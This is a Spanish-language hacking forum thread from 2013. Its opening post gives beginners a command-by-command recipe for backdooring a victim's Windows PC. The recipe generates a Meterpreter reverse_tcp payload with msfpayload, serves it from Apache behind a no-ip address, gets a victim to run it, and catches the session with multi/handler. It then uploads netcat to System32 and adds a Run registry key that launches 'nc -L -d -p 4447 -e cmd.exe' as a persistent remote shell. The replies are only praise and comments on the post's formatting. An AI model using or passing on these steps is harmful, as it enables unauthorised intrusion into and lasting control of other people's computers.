Metasploit + meterpreter + nc backdoor

Iniciado por TrollMine, Septiembre 18, 2013, 05:37:13 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 18, 2013, 05:37:13 PM Ultima modificación: Septiembre 20, 2013, 01:54:09 AM por ZanGetsu
Antes que todo aclarar que este post es para Newbie (lo explico bien por eso)

Vale, empecemos; primero abrimos la consola y generamos un .exe con msfpayload
msfpayload windows/meterpreter/reverse_tcp lhost=tu ip pública lport=el puerto X > /root/Desktop/payload.exe

vale, ahora para mayor comodidad arrancaremos apache, y subiéremos el .exe.

A continuación pondremos a escuchar meterpreter, por lo que abrimos metasploit, seleccionamos el exploit

use exploit/multi/handler,

en este caso usaré este payload, si vosotros encontráis alguno mejor podéis usarlo

set payload windows/meterpreter/reverse_tcp ahora marcamos el puerto y el host con:

set lhost (y tu ip o no-ip)set lport ( y el puerto) vale,

ahora le damos run con exploit -j Ok,

respecto a apache, abrimos el puerto 80, por que utilizaremos el no-ip como url para enviar el "troyano", una vez que tengamos meterpreter escuchando podemos pasarle la url a la víctima, por ejemplo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (ya que es el nombre que le dimos anteriormente) una vez que nos aseguramos de que la víctima ha descargado el archivo y lo ha ejecutado, nos saldrá en la consola que se ha habierto una sesión, ponemos; sessions -i 1

Ahora para asegurarnos la víctima, le subiremos netcat (nc) con; upload /pentest/windows-binaries/tools/nc.exe C:\\Windows\\System32\\nc.exe en ese "código" hemos seleccionado nuestra ruta local, y la ruta de la víctima, ahora le añadiremos al registro

netcat; reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v Backdoor -d C:\\Windows\\System32\\nc.exe" -L -d  -p (un puerto diferente a el anterior ej: 4447) -e cmd.exe" vale, ahora subiremos el mismo "troyano" (para poder ejecutarlo con netcat, ya que solo tenemos acceso a la consola)con; upload /root/Desktop/payload.exe C:\\Windows\\System32\\payload.exe

Y yá esta, ahora guardaremos su ip en un txt, y cuando queramos conectarnos pondremos; nc (su ip) 4447 (que es el puerto)


Perdón si hice algo mal, no dudéis en comentarlo y si tenéis una duda igual...
Skype: trollmine99

No puedo leer el post, me duelen los ojos con esa mala elección de colores sobre el texto. Para la próxima usa colores oscuros sobre fondo blanco. Saludos.-

CrazyKade


Bueno primero lo siendo, mañana si puedo lo cambiaré y deberías mirar el brillo de tu pantalla por que para mi es legible totalmente o.O
Skype: trollmine99

Buen post, me ha servido. Te sigo TrollMine. La verdad que cada vez me gustan más tus post.

Gracias ^^

hola, el contenido de tu post esta bueno, pero
deberías preocuparte un poco por el orden en el post y la legibilidad
edite un poco tu post, le quite las letras naranjas y le di un poco de espacio,
saludos y gracias !

Septiembre 20, 2013, 09:46:03 AM #5 Ultima modificación: Septiembre 20, 2013, 09:54:19 AM por TrollMine
Muchas gracias ZanGetsu :))
La verdad que estaba un poco amontonado
Skype: trollmine99